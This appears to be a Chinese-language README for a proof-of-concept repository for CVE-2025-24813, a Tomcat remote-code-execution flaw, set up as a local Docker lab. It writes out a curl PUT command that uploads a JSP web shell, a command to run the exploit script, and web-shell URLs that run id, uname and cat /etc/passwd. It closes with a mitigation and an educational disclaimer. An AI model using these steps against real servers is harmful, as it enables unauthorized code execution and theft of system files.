此仓库包含针对 CVE-2025-24813 的完整概念验证 (PoC) 漏洞利用代码,该漏洞是 Apache Tomcat 中通过 HTTP PUT 方法部署恶意 JSP Web Shell 的远程代码执行 (RCE) 漏洞。
🔥 此漏洞利用示例展示了攻击者如何通过文件上传和有效载荷执行在未妥善保护的 Tomcat 实例中实现 RCE。
CVE-2025-24813/
├── docker/
│ ├── Dockerfile
│ └── web.xml
├── exploit/
│ ├── 1_exploit_cve_2025_24813.py
│ └── shell.jsp
├── screenshots/
│ ├── 1_tomcat_running.png
│ ├── 2_docker_started.png
│ ├── 3_upload_shell.png
│ ├── 4_run_python_exploit.png
│ ├── 5_access_shell_whoami.png
│ ├── 6_view_etc_passwd.png
│ ├── 7_run_uname.png
│ ├── 8_run_id.png
│ └── 9_run_pwd.png
├── .gitignore
├── LICENSE
└── README.md
cd docker
sudo docker build -t cve-24813-tomcat .
sudo docker run -it -p 8080:8080 cve-24813-tomcat
📸 
📸 
curl -X PUT --upload-file exploit/shell.jsp http://localhost:8080/shell.jsp
📸 
python3 exploit/1_exploit_cve_2025_24813.py
📸 
http://localhost:8080/shell.jsp?cmd=id
http://localhost:8080/shell.jsp?cmd=uname -a
http://localhost:8080/shell.jsp?cmd=cat /etc/passwd
📸 
📸 
📸 
📸 
📸 
web.xml 或服务器配置中禁用 PUT/DELETE 方法本项目仅供 教育和研究目的 使用。未经授权在您不拥有或无权测试的系统上进行测试、利用或使用属违法行为且不道德。